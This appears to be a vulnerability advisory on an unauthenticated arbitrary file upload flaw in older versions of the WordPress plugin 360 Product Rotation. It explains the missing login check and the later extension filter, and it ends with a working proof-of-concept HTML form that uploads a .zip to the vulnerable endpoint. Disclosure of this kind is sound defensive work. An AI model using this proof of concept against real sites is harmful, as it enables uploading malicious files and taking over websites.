One of the things that we do to provide our customers with the best data on WordPress plugin vulnerabilities is to monitor third party data on hacking attempts. That sometimes leads us to finding what looks to be exploitation of vulnerabilities that a hacker has just discovered in the current version of a plugin. In other cases it shows old vulnerabilities that hackers are still trying to exploit. We recently spotted an attempt to exploit an arbitrary file upload vulnerability in older versions of the plugin 360 Product Rotation. We couldn’t find a page that describes the issue to link to for our data on the vulnerability, so here are the details.

The hacking attempt involved a request sent to the page /includes/plugin-media-upload.php. Through that file you upload a .zip file and the contents are extracted and saved in a directory on the website.

While the feature this upload functionality was used by, looks to have only been intended for logged in users (the front end of it was removed in version 1.2.4), there is no check done to insure the person attempting the upload is logged in (we notified the developer about that).

Back when this feature was introduced in version 1.1.3 of the plugin, there was no restriction on what type of files could be included in the .zip file, leading to an arbitrary file upload vulnerability.

In version 1.2.1 a function was added to check if executable files are included in the .zip file:

function getExcludedFiles($path)
{
	$files = getDirContents($path);
	$extensions_excluded = array('php','php3','py','sh');
	$files_excluded      = array();
 
	foreach($files as $k=>$file){
		$extension = strtolower(pathinfo($file, PATHINFO_EXTENSION));
		if(in_array($extension,$extensions_excluded))
		{
			$files_excluded[] = $file;
		}
	}
 
	return $files_excluded;
}

If any executable files are found the in the .zip, the files do not get extracted from it.

In a good reminder that you can not rely on checking the changelog of a plugin to determine if there has been a security fix, the only change listed for 1.2.1 was:

Bugfix: .zip file created on some Windows systems did not extract correctly

Proof of Concept

The following proof of concept will upload the selected .zip file and extract its contents in to the directory /wp-content/uploads/yofla360/.

Make sure to replace “[path to WordPress]” with the location of WordPress. You will also need to include the HTTP request header “X-Requested-With” with the request.

<html>
<body>
<form action="http://[path to WordPress]/wp-content/plugins/360-product-rotation/includes/plugin-media-upload.php" method="POST" enctype="multipart/form-data">
<input type="file" name="FileInput" />
<input type="submit" value="Submit" />
</form>
</body>
</html>